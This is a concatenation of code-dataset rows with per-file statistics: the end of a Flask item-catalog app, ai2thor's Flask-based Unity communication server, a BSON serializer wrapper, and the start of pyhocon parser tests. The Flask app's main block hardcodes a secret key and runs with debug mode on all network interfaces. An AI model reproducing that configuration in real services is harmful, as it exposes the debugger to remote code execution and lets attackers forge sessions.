return render_template('categoryitem.html', item=item,
category=category, categories=categories)
# Create a new item
@app.route('/catalog/category/new/', methods=['GET', 'POST'])
def newCategoryItem():
if 'token' not in login_session:
return redirect('/login')
categories = session.query(Category).all()
user = session.query(User).filter_by(email=login_session['email']).one()
if request.method == 'POST':
category = session.query(Category).filter_by(
name=request.form['category']).first()
newItem = Item(name=request.form['name'],
description=request.form['description'],
category_id=category.id, user_id=user.id)
session.add(newItem)
session.commit()
flash('New Item {} Successfully Added'.format(newItem.name))
return redirect(url_for('showCatalog'))
else:
return render_template('newcategoryitem.html', categories=categories)
# Edit a category item
@app.route('/catalog/<category>/<item>/edit', methods=['GET', 'POST'])
def editCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
editedItem = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
categories = session.query(Category).all()
if user.id != editedItem.user_id:
flash('You are not authorized to edit {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=editedItem.name))
if request.method == 'POST':
if request.form['name']:
editedItem.name = request.form['name']
if request.form['description']:
editedItem.description = request.form['description']
if request.form['category']:
category = session.query(Category).filter_by(
name=request.form['category']).first()
editedItem.category_id = category.id
session.add(editedItem)
session.commit()
flash('Item Successfully Edited')
return redirect(url_for('showCategoryItem',
category=request.form['category'],
item=editedItem.name))
else:
return render_template('editcategoryitem.html',
category=categoryItem.name,
item=editedItem.name, categories=categories,
editedItem=editedItem)
# Delete a category item
@app.route('/catalog/<category>/<item>/delete', methods=['GET', 'POST'])
def deleteCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
itemToDelete = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
if user.id != itemToDelete.user_id:
flash('You are not authorized to delete {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=itemToDelete.name))
if request.method == 'POST':
session.delete(itemToDelete)
session.commit()
flash('Item Successfully Deleted')
return redirect(url_for('showCatalog'))
else:
return render_template('deletecategoryitem.html',
category=categoryItem.name,
item=itemToDelete.name)
if __name__ == '__main__':
app.secret_key = 'N10kuN!'
app.debug = True
app.run(host='0.0.0.0', port=5000)
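The read-only JSON routes above can be smoke-tested with Flask's built-in test client; a short sketch (assumes this file is importable as application, that catalog.db exists, and that 'Snowboarding' is a hypothetical category name):
from application import app

with app.test_client() as client:
    print(client.get('/catalog/JSON').get_json())                 # all categories plus the 3 latest items
    print(client.get('/catalog/Snowboarding/JSON').get_json())    # items in one (hypothetical) category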
| 39.296636
| 79
| 0.63323
| 1,440
| 12,850
| 5.526389
| 0.172917
| 0.073888
| 0.035185
| 0.026137
| 0.471224
| 0.408897
| 0.388791
| 0.327344
| 0.26753
| 0.241267
| 0
| 0.005621
| 0.238521
| 12,850
| 326
| 80
| 39.417178
| 0.807665
| 0.059767
| 0
| 0.338645
| 0
| 0
| 0.171167
| 0.032821
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055777
| false
| 0
| 0.043825
| 0
| 0.211155
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139f6d8d256ac39b6d5d2e96db49c8e71d3fc905
| 20,472
|
py
|
Python
|
ai2thor/server.py
|
aliang8/ai2thor
|
3ef92cf5437e2d60127c77bd59d5b7394eebb36c
|
[
"Apache-2.0"
] | 1
|
2019-04-11T14:51:04.000Z
|
2019-04-11T14:51:04.000Z
|
ai2thor/server.py
|
aliang8/ai2thor
|
3ef92cf5437e2d60127c77bd59d5b7394eebb36c
|
[
"Apache-2.0"
] | null | null | null |
ai2thor/server.py
|
aliang8/ai2thor
|
3ef92cf5437e2d60127c77bd59d5b7394eebb36c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright Allen Institute for Artificial Intelligence 2017
"""
ai2thor.server
Handles all communication with Unity through a Flask service. Messages
are sent to the controller using a pair of request/response queues.
"""
import json
import logging
import sys
import os
import os.path
try:
from queue import Empty
except ImportError:
from Queue import Empty
import time
import warnings
from flask import Flask, request, make_response, abort
import werkzeug
import werkzeug.serving
import werkzeug.http
import numpy as np
from enum import Enum
from ai2thor.util.depth import apply_real_noise, generate_noise_indices
logging.getLogger('werkzeug').setLevel(logging.ERROR)
werkzeug.serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1'
MAX_DEPTH = 5000
# get with timeout to allow quit
def queue_get(que):
res = None
while True:
try:
res = que.get(block=True, timeout=0.5)
break
except Empty:
pass
return res
class NumpyAwareEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.generic):
return np.asscalar(obj)
return super(NumpyAwareEncoder, self).default(obj)
class BufferedIO(object):
def __init__(self, wfile):
self.wfile = wfile
self.data = []
def write(self, output):
self.data.append(output)
def flush(self):
self.wfile.write(b"".join(self.data))
self.wfile.flush()
def close(self):
return self.wfile.close()
@property
def closed(self):
return self.wfile.closed
class ThorRequestHandler(werkzeug.serving.WSGIRequestHandler):
def run_wsgi(self):
old_wfile = self.wfile
self.wfile = BufferedIO(self.wfile)
result = super(ThorRequestHandler, self).run_wsgi()
self.wfile = old_wfile
return result
class MultiAgentEvent(object):
def __init__(self, active_agent_id, events):
self._active_event = events[active_agent_id]
self.metadata = self._active_event.metadata
self.screen_width = self._active_event.screen_width
self.screen_height = self._active_event.screen_height
self.events = events
self.third_party_camera_frames = []
# XXX add methods for depth,sem_seg
@property
def cv2img(self):
return self._active_event.cv2img
def add_third_party_camera_image(self, third_party_image_data):
self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))
def read_buffer_image(buf, width, height, flip_y=True, flip_x=False, dtype=np.uint8,
flip_rb_colors=False):
im_bytes = np.frombuffer(buf.tobytes(), dtype=dtype) if sys.version_info.major < 3 \
else np.frombuffer(buf, dtype=dtype)
im = im_bytes.reshape(height, width, -1)
if flip_y:
im = np.flip(im, axis=0)
if flip_x:
im = np.flip(im, axis=1)
if flip_rb_colors:
im = im[..., ::-1]
return im
def unique_rows(arr, return_index=False, return_inverse=False):
arr = np.ascontiguousarray(arr).copy()
b = arr.view(np.dtype((np.void, arr.dtype.itemsize * arr.shape[1])))
if return_inverse:
_, idx, inv = np.unique(b, return_index=True, return_inverse=True)
else:
_, idx = np.unique(b, return_index=True)
unique = arr[idx]
if return_index and return_inverse:
return unique, idx, inv
elif return_index:
return unique, idx
elif return_inverse:
return unique, inv
else:
return unique
class Event(object):
"""
Object that is returned from a call to controller.step().
This class wraps the screenshot that Unity captures as well
as the metadata sent about each object
"""
def __init__(self, metadata):
self.metadata = metadata
self.screen_width = metadata['screenWidth']
self.screen_height = metadata['screenHeight']
self.frame = None
self.depth_frame = None
self.normals_frame = None
self.flow_frame = None
self.color_to_object_id = {}
self.object_id_to_color = {}
self.instance_detections2D = None
self.instance_masks = {}
self.class_masks = {}
self.instance_segmentation_frame = None
self.class_segmentation_frame = None
self.class_detections2D = {}
self.process_colors()
self.process_visible_bounds2D()
self.third_party_camera_frames = []
self.third_party_class_segmentation_frames = []
self.third_party_instance_segmentation_frames = []
self.third_party_depth_frames = []
self.third_party_normals_frames = []
self.third_party_flows_frames = []
self.events = [self] # Ensure we have a similar API to MultiAgentEvent
@property
def image_data(self):
warnings.warn("Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format")
return None
def process_visible_bounds2D(self):
if self.instance_detections2D and len(self.instance_detections2D) > 0:
for obj in self.metadata['objects']:
obj['visibleBounds2D'] = (obj['visible'] and obj['objectId'] in self.instance_detections2D)
def process_colors(self):
if 'colors' in self.metadata and self.metadata['colors']:
for color_data in self.metadata['colors']:
name = color_data['name']
c_key = tuple(color_data['color'])
self.color_to_object_id[c_key] = name
self.object_id_to_color[name] = c_key
def objects_by_type(self, object_type):
return [obj for obj in self.metadata['objects'] if obj['objectType'] == object_type]
def process_colors_ids(self):
if self.instance_segmentation_frame is None:
return
MIN_DETECTION_LEN = 0
self.instance_detections2D = {}
unique_ids, unique_inverse = unique_rows(self.instance_segmentation_frame.reshape(-1, 3), return_inverse=True)
unique_inverse = unique_inverse.reshape(self.instance_segmentation_frame.shape[:2])
unique_masks = (np.tile(unique_inverse[np.newaxis, :, :], (len(unique_ids), 1, 1)) == np.arange(len(unique_ids))[:, np.newaxis, np.newaxis])
#for unique_color_ind, unique_color in enumerate(unique_ids):
for color_bounds in self.metadata['colorBounds']:
color = np.array(color_bounds['color'])
color_name = self.color_to_object_id.get(tuple(int(cc) for cc in color), 'background')
cls = color_name
simObj = False
if '|' in cls:
cls = cls.split('|')[0]
simObj = True
bb = np.array(color_bounds['bounds'])
bb[[1,3]] = self.metadata['screenHeight'] - bb[[3,1]]
if not((bb[2] - bb[0]) < MIN_DETECTION_LEN or (bb[3] - bb[1]) < MIN_DETECTION_LEN):
if cls not in self.class_detections2D:
self.class_detections2D[cls] = []
self.class_detections2D[cls].append(bb)
color_ind = np.argmin(np.sum(np.abs(unique_ids - color), axis=1))
if simObj:
self.instance_detections2D[color_name] = bb
self.instance_masks[color_name] = unique_masks[color_ind, ...]
if cls not in self.class_masks:
self.class_masks[cls] = unique_masks[color_ind, ...]
else:
self.class_masks[cls] = np.logical_or(self.class_masks[cls], unique_masks[color_ind, ...])
def _image_depth(self, image_depth_data, **kwargs):
image_depth = read_buffer_image(image_depth_data, self.screen_width, self.screen_height)
depth_format = kwargs['depth_format']
image_depth_out = image_depth[:,:,0] + image_depth[:,:,1] / np.float32(256) + image_depth[:,:,2] / np.float32(256 ** 2)
multiplier = 1.0
        if depth_format != DepthFormat.Normalized:
            multiplier = kwargs['camera_far_plane'] - kwargs['camera_near_plane']
        # millimeter scaling stacks on top of the near/far range scaling above
        if depth_format == DepthFormat.Millimeters:
            multiplier *= 1000
image_depth_out *= multiplier / 256.0
depth_image_float = image_depth_out.astype(np.float32)
if 'add_noise' in kwargs and kwargs['add_noise']:
depth_image_float = apply_real_noise(
depth_image_float,
self.screen_width,
indices=kwargs['noise_indices']
)
return depth_image_float
def add_image_depth_robot(self, image_depth_data, depth_format, **kwargs):
multiplier = 1.0
camera_far_plane = kwargs.pop('camera_far_plane', 1)
camera_near_plane = kwargs.pop('camera_near_plane', 0)
if depth_format == DepthFormat.Normalized:
multiplier = 1.0 / (camera_far_plane - camera_near_plane)
elif depth_format == DepthFormat.Millimeters:
multiplier = 1000.0
image_depth = read_buffer_image(
image_depth_data, self.screen_width, self.screen_height, **kwargs
).reshape(self.screen_height, self.screen_width) * multiplier
self.depth_frame = image_depth.astype(np.float32)
def add_image_depth(self, image_depth_data, **kwargs):
self.depth_frame = self._image_depth(image_depth_data, **kwargs)
def add_third_party_image_depth(self, image_depth_data, **kwargs):
self.third_party_depth_frames.append(self._image_depth(image_depth_data, **kwargs))
def add_third_party_image_normals(self, normals_data):
self.third_party_normals_frames.append(read_buffer_image(normals_data, self.screen_width, self.screen_height))
def add_image_normals(self, image_normals_data):
self.normals_frame = read_buffer_image(image_normals_data, self.screen_width, self.screen_height)
def add_third_party_image_flows(self, flows_data):
self.third_party_flows_frames.append(read_buffer_image(flows_data, self.screen_width, self.screen_height))
def add_image_flows(self, image_flows_data):
        self.flow_frame = read_buffer_image(image_flows_data, self.screen_width, self.screen_height)
def add_third_party_camera_image(self, third_party_image_data):
self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))
def add_image(self, image_data, **kwargs):
self.frame = read_buffer_image(image_data, self.screen_width, self.screen_height, **kwargs)
def add_image_ids(self, image_ids_data):
self.instance_segmentation_frame = read_buffer_image(image_ids_data, self.screen_width, self.screen_height)
self.process_colors_ids()
def add_third_party_image_ids(self, image_ids_data):
self.third_party_instance_segmentation_frames.append(read_buffer_image(image_ids_data, self.screen_width, self.screen_height))
def add_image_classes(self, image_classes_data):
self.class_segmentation_frame = read_buffer_image(image_classes_data, self.screen_width, self.screen_height)
def add_third_party_image_classes(self, image_classes_data):
self.third_party_class_segmentation_frames.append(read_buffer_image(image_classes_data, self.screen_width, self.screen_height))
def cv2image(self):
warnings.warn("Deprecated - please use event.cv2img")
return self.cv2img
@property
def cv2img(self):
return self.frame[...,::-1]
@property
def pose(self):
agent_meta = self.metadata['agent']
loc = agent_meta['position']
rotation = round(agent_meta['rotation']['y'] * 1000)
horizon = round(agent_meta['cameraHorizon'] * 1000)
return (round(loc['x'] * 1000), round(loc['z'] * 1000), rotation, horizon)
@property
def pose_discrete(self):
# XXX should have this as a parameter
step_size = 0.25
agent_meta = self.metadata['agent']
loc = agent_meta['position']
rotation = int(agent_meta['rotation']['y'] / 90.0)
horizon = int(round(agent_meta['cameraHorizon']))
return (int(loc['x'] / step_size), int(loc['z'] / step_size), rotation, horizon)
def get_object(self, object_id):
for obj in self.metadata['objects']:
if obj['objectId'] == object_id:
return obj
return None
class MultipartFormParser(object):
@staticmethod
def get_boundary(request_headers):
for h, value in request_headers:
if h == 'Content-Type':
ctype, ct_opts = werkzeug.http.parse_options_header(value)
boundary = ct_opts['boundary'].encode('ascii')
return boundary
return None
def __init__(self, data, boundary):
self.form = {}
self.files = {}
full_boundary = b'\r\n--' + boundary
view = memoryview(data)
i = data.find(full_boundary)
while i >= 0:
next_offset = data.find(full_boundary, i + len(full_boundary))
if next_offset < 0:
break
headers_offset = i + len(full_boundary) + 2
body_offset = data.find(b'\r\n\r\n', headers_offset)
raw_headers = view[headers_offset: body_offset]
body = view[body_offset + 4: next_offset]
i = next_offset
headers = {}
for header in raw_headers.tobytes().decode('ascii').strip().split("\r\n"):
k,v = header.split(':')
headers[k.strip()] = v.strip()
ctype, ct_opts = werkzeug.http.parse_options_header(headers['Content-Type'])
cdisp, cd_opts = werkzeug.http.parse_options_header(headers['Content-disposition'])
assert cdisp == 'form-data'
if 'filename' in cd_opts:
if cd_opts['name'] not in self.files:
self.files[cd_opts['name']] = []
self.files[cd_opts['name']].append(body)
else:
if ctype == 'text/plain' and 'charset' in ct_opts:
body = body.tobytes().decode(ct_opts['charset'])
if cd_opts['name'] not in self.form:
self.form[cd_opts['name']] = []
self.form[cd_opts['name']].append(body)
class DepthFormat(Enum):
Meters = 0,
Normalized = 1,
Millimeters = 2
class Server(object):
def __init__(
self,
request_queue,
response_queue,
host,
port=0,
threaded=False,
depth_format=DepthFormat.Meters,
add_depth_noise=False,
width=300,
height=300
):
app = Flask(__name__,
template_folder=os.path.realpath(
os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'templates')))
self.image_buffer = None
self.app = app
self.client_token = None
self.subscriptions = []
self.app.config.update(PROPAGATE_EXCEPTIONS=False, JSONIFY_PRETTYPRINT_REGULAR=False)
self.port = port
self.last_rate_timestamp = time.time()
self.frame_counter = 0
self.debug_frames_per_interval = 50
self.xwindow_id = None
self.wsgi_server = werkzeug.serving.make_server(host, self.port, self.app, threaded=threaded, request_handler=ThorRequestHandler)
# used to ensure that we are receiving frames for the action we sent
self.sequence_id = 0
self.last_event = None
self.camera_near_plane = 0.1
self.camera_far_plane = 20.0
self.depth_format = depth_format
self.add_depth_noise = add_depth_noise
self.noise_indices = None
if add_depth_noise:
assert width == height,\
"Noise supported with square dimension images only."
self.noise_indices = generate_noise_indices(width)
@app.route('/ping', methods=['get'])
def ping():
return 'pong'
@app.route('/train', methods=['post'])
def train():
if request.headers['Content-Type'].split(';')[0] == 'multipart/form-data':
form = MultipartFormParser(request.get_data(), MultipartFormParser.get_boundary(request.headers))
metadata = json.loads(form.form['metadata'][0])
token = form.form['token'][0]
else:
form = request
metadata = json.loads(form.form['metadata'])
token = form.form['token']
if self.client_token and token != self.client_token:
abort(403)
if self.frame_counter % self.debug_frames_per_interval == 0:
now = time.time()
# rate = self.debug_frames_per_interval / float(now - self.last_rate_timestamp)
self.last_rate_timestamp = now
# import datetime
# print("%s %s/s" % (datetime.datetime.now().isoformat(), rate))
if metadata['sequenceId'] != self.sequence_id:
raise ValueError("Sequence id mismatch: %s vs %s" % (
metadata['sequenceId'], self.sequence_id))
events = []
for i, a in enumerate(metadata['agents']):
e = Event(a)
image_mapping = dict(
image=e.add_image,
image_depth=lambda x: e.add_image_depth(
x,
depth_format=self.depth_format,
camera_near_plane=self.camera_near_plane,
camera_far_plane=self.camera_far_plane,
add_noise=self.add_depth_noise,
noise_indices=self.noise_indices
),
image_ids=e.add_image_ids,
image_classes=e.add_image_classes,
image_normals=e.add_image_normals,
image_flows=e.add_image_flows
)
for key in image_mapping.keys():
if key in form.files:
image_mapping[key](form.files[key][i])
third_party_image_mapping = dict(
image=e.add_image,
image_thirdParty_depth=lambda x: e.add_third_party_image_depth(
x,
depth_format=self.depth_format,
camera_near_plane=self.camera_near_plane,
camera_far_plane=self.camera_far_plane
),
image_thirdParty_image_ids=e.add_third_party_image_ids,
image_thirdParty_classes=e.add_third_party_image_classes,
image_thirdParty_normals=e.add_third_party_image_normals,
image_thirdParty_flows=e.add_third_party_image_flows
)
if a['thirdPartyCameras'] is not None:
for ti, t in enumerate(a['thirdPartyCameras']):
for key in third_party_image_mapping.keys():
if key in form.files:
third_party_image_mapping[key](form.files[key][ti])
events.append(e)
if len(events) > 1:
self.last_event = event = MultiAgentEvent(metadata['activeAgentId'], events)
else:
self.last_event = event = events[0]
for img in form.files.get('image-thirdParty-camera', []):
self.last_event.add_third_party_camera_image(img)
request_queue.put_nowait(event)
self.frame_counter += 1
next_action = queue_get(response_queue)
if 'sequenceId' not in next_action:
self.sequence_id += 1
next_action['sequenceId'] = self.sequence_id
else:
self.sequence_id = next_action['sequenceId']
resp = make_response(json.dumps(next_action, cls=NumpyAwareEncoder))
return resp
def start(self):
self.wsgi_server.serve_forever()
def set_init_params(self, init_params):
self.camera_near_plane = init_params['cameraNearPlane']
self.camera_far_plane = init_params['cameraFarPlane']
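A rough sketch of how a Server like the one above gets wired up: the controller owns the request/response queues, the Server serves /train for the Unity process, and actions flow back through the response queue. The queue types and the background thread are assumptions for illustration (Server and DepthFormat are the names defined in this module):
import threading
from queue import Queue

request_queue = Queue()    # Events parsed from Unity's POSTs to /train
response_queue = Queue()   # actions the controller wants Unity to perform next

server = Server(request_queue, response_queue, host='127.0.0.1', port=0,
                depth_format=DepthFormat.Meters, width=300, height=300)
threading.Thread(target=server.start, daemon=True).start()   # serve_forever() on a worker thread

# Controller side, roughly:
#   event = request_queue.get()                        # next Event (or MultiAgentEvent)
#   response_queue.put_nowait({'action': 'MoveAhead'})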
| 37.289617
| 148
| 0.621483
| 2,495
| 20,472
| 4.826854
| 0.164729
| 0.028232
| 0.021174
| 0.022088
| 0.315204
| 0.240056
| 0.19721
| 0.169642
| 0.125052
| 0.125052
| 0
| 0.010382
| 0.280139
| 20,472
| 548
| 149
| 37.357664
| 0.806813
| 0.039371
| 0
| 0.119904
| 0
| 0.002398
| 0.049934
| 0.001172
| 0
| 0
| 0
| 0
| 0.004796
| 1
| 0.107914
| false
| 0.002398
| 0.040767
| 0.014388
| 0.23741
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a03223c85f270b2a1843680f883661d539e4c0
| 903
|
py
|
Python
|
anyser/impls/bson.py
|
Cologler/anyser-python
|
52afa0a62003adcfe269f47d81863e00381d8ff9
|
[
"MIT"
] | null | null | null |
anyser/impls/bson.py
|
Cologler/anyser-python
|
52afa0a62003adcfe269f47d81863e00381d8ff9
|
[
"MIT"
] | null | null | null |
anyser/impls/bson.py
|
Cologler/anyser-python
|
52afa0a62003adcfe269f47d81863e00381d8ff9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020~2999 - Cologler <skyoflw@gmail.com>
# ----------
#
# ----------
import bson
import struct
from ..err import SerializeError
from ..abc import *
from ..core import register_format
@register_format('bson', '.bson')
class BsonSerializer(ISerializer):
format_name = 'bson'
def loadb(self, b: bytes, options: dict) -> Any:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.loads(b, **kwargs)
except Exception as e:
raise SerializeError(e)
def dumpb(self, obj, options: dict) -> bytes:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.dumps(obj, **kwargs)
except Exception as e:
raise SerializeError(e)
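The serializer above is a thin wrapper around the standalone bson package; the round trip it delegates to looks roughly like this (sketch of the underlying calls, not the anyser public API):
import bson

payload = {'name': 'demo', 'count': 3}
blob = bson.dumps(payload)          # bytes, as dumpb() returns
assert bson.loads(blob) == payload  # dict back, as loadb() returns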
| 25.083333
| 57
| 0.605759
| 102
| 903
| 5.27451
| 0.480392
| 0.052045
| 0.066915
| 0.092937
| 0.472119
| 0.472119
| 0.472119
| 0.472119
| 0.30855
| 0.30855
| 0
| 0.013393
| 0.255814
| 903
| 35
| 58
| 25.8
| 0.787202
| 0.108527
| 0
| 0.5
| 0
| 0
| 0.016291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.208333
| 0
| 0.458333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a130fcf753fdc5859f92859bfe939d85633259
| 69,875
|
py
|
Python
|
tests/test_config_parser.py
|
KevinMFong/pyhocon
|
091830001f2d44f91f0f8281fb119c87fd1f6660
|
[
"Apache-2.0"
] | 424
|
2015-01-03T02:48:46.000Z
|
2022-03-22T02:47:43.000Z
|
tests/test_config_parser.py
|
KevinMFong/pyhocon
|
091830001f2d44f91f0f8281fb119c87fd1f6660
|
[
"Apache-2.0"
] | 251
|
2015-02-03T20:47:53.000Z
|
2022-03-19T16:45:15.000Z
|
tests/test_config_parser.py
|
KevinMFong/pyhocon
|
091830001f2d44f91f0f8281fb119c87fd1f6660
|
[
"Apache-2.0"
] | 127
|
2015-01-09T14:31:49.000Z
|
2022-03-19T15:47:30.000Z
|
# -*- encoding: utf-8 -*-
import json
import os
import shutil
import tempfile
from collections import OrderedDict
from datetime import timedelta
from pyparsing import ParseBaseException, ParseException, ParseSyntaxException
import mock
import pytest
from pyhocon import (ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree)
from pyhocon.exceptions import (ConfigException, ConfigMissingException,
ConfigWrongTypeException)
try:
from dateutil.relativedelta import relativedelta as period
except Exception:
from datetime import timedelta as period
class TestConfigParser(object):
def test_parse_simple_value(self):
config = ConfigFactory.parse_string(
"""t = {
c = 5
"d" = true
e.y = {
f: 7
g: "hey dude!"
h: hey man
i = \"\"\"
"first line"
"second" line
\"\"\"
}
j = [1, 2, 3]
u = 192.168.1.3/32
g = null
}
"""
)
assert config.get_string('t.c') == '5'
assert config.get_int('t.c') == 5
assert config.get_float('t.c') == 5.0
assert config.get('t.e.y.f') == 7
assert config.get('t.e.y.g') == 'hey dude!'
assert config.get('t.e.y.h') == 'hey man'
assert [v.strip() for v in config.get('t.e.y.i').split('\n')] == ['', '"first line"', '"second" line', '']
assert config.get_bool('t.d') is True
assert config.get_int('t.e.y.f') == 7
assert config.get('t.j') == [1, 2, 3]
assert config.get('t.u') == '192.168.1.3/32'
assert config.get_int('t.g') is None
assert config.get_float('t.g') is None
assert config.get_string('t.g') is None
assert config.get_bool('t.g') is None
assert config.get_list('t.g') is None
assert config.get_config('t.g') is None
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_fail_parse_forbidden_characters(self, forbidden_char):
with pytest.raises(ParseBaseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['$', '"'])
def test_fail_parse_forbidden_characters_in_context(self, forbidden_char):
with pytest.raises(ParseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_parse_forbidden_characters_quoted(self, forbidden_char):
value = "hey man{}".format(forbidden_char)
config = ConfigFactory.parse_string('a: "{}"'.format(value))
assert config.get_string("a") == value
def test_parse_with_enclosing_brace(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: 5
}
}
"""
)
assert config.get_string('a.b') == '5'
@pytest.mark.parametrize('data_set', [
('a: 1 minutes', period(minutes=1)),
('a: 1minutes', period(minutes=1)),
('a: 2 minute', period(minutes=2)),
('a: 3 m', period(minutes=3)),
('a: 3m', period(minutes=3)),
('a: 3 min', '3 min'),
('a: 4 seconds', period(seconds=4)),
('a: 5 second', period(seconds=5)),
('a: 6 s', period(seconds=6)),
('a: 6 sec', '6 sec'),
('a: 7 hours', period(hours=7)),
('a: 8 hour', period(hours=8)),
('a: 9 h', period(hours=9)),
('a: 10 weeks', period(weeks=10)),
('a: 11 week', period(weeks=11)),
('a: 12 w', period(weeks=12)),
('a: 10 days', period(days=10)),
('a: 11 day', period(days=11)),
('a: 12 d', period(days=12)),
('a: 110 microseconds', period(microseconds=110)),
('a: 111 microsecond', period(microseconds=111)),
('a: 112 micros', period(microseconds=112)),
('a: 113 micro', period(microseconds=113)),
('a: 114 us', period(microseconds=114)),
('a: 110 milliseconds', timedelta(milliseconds=110)),
('a: 111 millisecond', timedelta(milliseconds=111)),
('a: 112 millis', timedelta(milliseconds=112)),
('a: 113 milli', timedelta(milliseconds=113)),
('a: 114 ms', timedelta(milliseconds=114)),
('a: 110 nanoseconds', period(microseconds=0)),
('a: 11000 nanoseconds', period(microseconds=11)),
('a: 1110000 nanosecond', period(microseconds=1110)),
('a: 1120000 nanos', period(microseconds=1120)),
('a: 1130000 nano', period(microseconds=1130)),
('a: 1140000 ns', period(microseconds=1140)),
])
def test_parse_string_with_duration(self, data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
def test_parse_string_with_duration_with_long_unit_name(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: 10 weeks
c: bar
"""
)
assert config['b'] == period(weeks=10)
def test_parse_with_list_mixed_types_with_durations_and_trailing_comma(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: [a, 1, 10 weeks, 5 minutes,]
c: bar
"""
)
assert config['b'] == ['a', 1, period(weeks=10), period(minutes=5)]
def test_parse_with_enclosing_square_bracket(self):
config = ConfigFactory.parse_string("[1, 2, 3]")
assert config == [1, 2, 3]
def test_quoted_key_with_dots(self):
config = ConfigFactory.parse_string(
"""
"a.b.c.d": 3
t {
"d": {
"c": 5
}
}
k {
"b.f.d": 7
}
"""
)
assert config['"a.b.c.d"'] == 3
assert config['t.d.c'] == 5
assert config['k."b.f.d"'] == 7
def test_dotted_notation_merge(self):
config = ConfigFactory.parse_string(
"""
a {
b = foo
c = bar
}
a.c = ${a.b}" "${a.b}
a.d = baz
"""
)
assert config['a.b'] == "foo"
assert config['a.c'] == "foo foo"
assert config['a.d'] == "baz"
def test_comma_to_separate_expr(self):
config = ConfigFactory.parse_string(
"""
a=1,
b="abc",
c=the man,
d=woof,
a-b-c-d=test,
a b c d=test2,
"a b c d e"=test3
"""
)
assert config.get('a') == 1
assert config.get('b') == 'abc'
assert config.get('c') == 'the man'
assert config.get('d') == 'woof'
assert config.get('a-b-c-d') == 'test'
assert config.get('a b c d') == 'test2'
assert config.get('a b c d e') == 'test3'
def test_dict_merge(self):
config = ConfigFactory.parse_string(
"""
a {
d {
g.h.j.u: 5
g {
h.d: 4
}
g.h.k: f d
}
h.i.m = 7
h.i {
d: 5
}
h.i {
e:65
}
}
""")
expected_result = {
"a": {
"d": {
"g": {
"h": {
"j": {
"u": 5
},
"d": 4,
"k": "f d"
}
}
},
"h": {
"i": {
"m": 7,
"d": 5,
"e": 65
}
}
}
}
assert expected_result == config
def test_parse_with_comments(self):
config = ConfigFactory.parse_string(
"""
// comment 1
# comment 2
{
c = test // comment 0
g = 6 test # comment 0
# comment 3
a: { # comment 4
b: test, # comment 5
} # comment 6
t = [1, # comment 7
2, # comment 8
3, # comment 9
]
} # comment 10
// comment 11
// comment 12
"""
)
assert config.get('c') == 'test'
assert config.get('g') == '6 test'
assert config.get('a.b') == 'test'
assert config.get_string('a.b') == 'test'
assert config.get('t') == [1, 2, 3]
def test_missing_config(self):
config = ConfigFactory.parse_string(
"""
a = 5
"""
)
        # b is not set, so this should raise an exception
with pytest.raises(ConfigMissingException):
config.get('b')
def test_parse_null(self):
config = ConfigFactory.parse_string(
"""
a = null
b = [null]
"""
)
assert config.get('a') is None
assert config.get('b')[0] is None
def test_parse_override(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
a.b {
c = 7
d = 8
}
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('a.b.d') == 8
def test_concat_dict(self):
config = ConfigFactory.parse_string(
"""
a: {b: 1}
a: {c: 2}
b: {c: 3} {d: 4} {
c: 5
}
"""
)
assert config.get('a.b') == 1
assert config.get('a.c') == 2
assert config.get('b.c') == 5
assert config.get('b.d') == 4
def test_concat_string(self):
config = ConfigFactory.parse_string(
"""
a = a b c
b = 5 b
c = b 7
